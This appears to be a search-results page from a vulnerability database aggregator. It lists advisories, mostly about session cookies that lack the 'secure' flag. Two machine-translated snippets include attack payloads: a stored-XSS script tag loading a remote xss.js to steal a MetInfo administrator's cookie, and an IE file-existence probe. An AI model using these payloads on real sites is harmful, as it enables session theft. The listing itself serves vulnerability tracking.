Lucene search
K

73 matches found

RedHat Linux
RedHat Linux
added 2015/04/07 3:8 p.m.0 views

novnc: session hijack through insecurely set session token cookies

It was discovered that noVNC did not properly set the 'secure' flag when issuing cookies. An attacker could use this flaw to intercept cookies via a man-in-the-middle attack...

4.3CVSS5.8AI score0.02183EPSS
Exploits0References4
Prion
Prion
added 2014/09/12 1:55 a.m.19 views

Session fixation

IBM Jazz Team Server, as used in Rational Collaborative Lifecycle Management; Rational Quality Manager 3.x before 3.0.1.6 iFix 3, 4.x before 4.0.7, and 5.x before 5.0.1; and other Rational products, does not set the secure flag for the session cookie in an https session, which makes it easier for...

5CVSS6.7AI score0.01667EPSS
Exploits0References2Affected Software7
Cvelist
Cvelist
added 2014/08/07 10:0 a.m.22 views

CVE-2014-3853

Pyplate 0.08 does not set the secure flag for the id cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...

6.5AI score0.01296EPSS
Exploits1References2
Prion
Prion
added 2013/06/21 2:55 p.m.12 views

Session fixation

The Browser in IBM Sterling Connect:Direct 1.4 before 1.4.0.11 and 1.5 through 1.5.0.1 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...

5CVSS6.8AI score0.01354EPSS
Exploits0References3Affected Software1
myhack58
myhack58
added 2013/02/23 12:0 a.m.16 views

Mastery OA contents of the log stored XSS can get the cookie-vulnerability warning-the black bar safety net

Mastery OA2013 and 2 0 1 0 version, Office Anywhere 2 0 1 3 work log edit page there is the storage typeXSS, and their superiors view the log after you can steal the cookie 1, the work log edit page source code to bypass the bypass a character can be constructedXSS! ! ! 1, the interception to giv...

1.5AI score
Exploits0
NVD
NVD
added 2011/12/16 11:55 a.m.14 views

CVE-2011-4728

The Server Administration Panel in Parallels Plesk Panel 10.2.0build1011110331.18 does not set the secure flag for a cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session, as demonstrated by cookies us...

5CVSS6.5AI score0.0116EPSS
Exploits0References2
myhack58
myhack58
added 2011/08/15 12:0 a.m.16 views

The latest MetInfo enterprise website management system V4. 0 XSS 0Day-vulnerability warning-the black bar safety net

Author: Noevil Post To: T00ls.Net Using the method, the online message: Name fill: NoevilSCRIPT SRC="HTTP://xxx/xss.js"/SCRIPT Content: feel free. Background the administrator to view the messages list, and automatically intercepts the Cookie, the NoXss will try to Keep Session Landing back to ta...

0.1AI score
Exploits0
ATTACKERKB
ATTACKERKB
added 2011/01/18 6:3 p.m.2 views

CVE-2009-5051

Hastymail2 before RC 8 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...

5CVSS5.6AI score0.01064EPSS
Exploits0References4
Prion
Prion
added 2011/01/18 6:3 p.m.12 views

Session fixation

Hastymail2 before RC 8 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...

5CVSS7AI score0.01064EPSS
Exploits0References2
OSV
OSV
added 2009/12/23 6:30 p.m.3 views

DEBIAN-CVE-2009-3584

SQL-Ledger 2.8.24 does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...

5CVSS6.8AI score0.01247EPSS
Exploits2References1
Positive Technologies
Positive Technologies
added 2008/12/19 12:0 a.m.6 views

PT-2008-5423 · Open Source Matters · Joomla!

Name of the Vulnerable Software and Affected Versions: Joomla! version 1.5.8 Description: The issue makes it easier for remote attackers to capture the session cookie by intercepting its transmission within an http session, as the secure flag is not set for the session cookie in an https session...

7.5CVSS7.4AI score0.01257EPSS
Exploits0References6
Prion
Prion
added 2008/12/03 5:30 p.m.16 views

Design/Logic Flaw

Octeth Oempro 3.5.5.1, and possibly other versions before 4, does not set the secure flag for the PHPSESSID cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session...

5CVSS7.1AI score0.01324EPSS
Exploits1References4Affected Software1
myhack58
myhack58
added 2007/12/17 12:0 a.m.12 views

An IE browser vulnerability security testing and analysis-vulnerability warning-the black bar safety net

Today saw on the Internet A IE little vulnerability. Do the following simple analysis The use method is as follows Program code: img src="sysimage://C:\WINNT\Notepad.exe,7 7 7" onError="document. write’bFile Exists!& lt;/b’;" Just start very strange this sysimage://is a Protocol,so in IE into:...

0.1AI score
Exploits0
Rows per page
Query Builder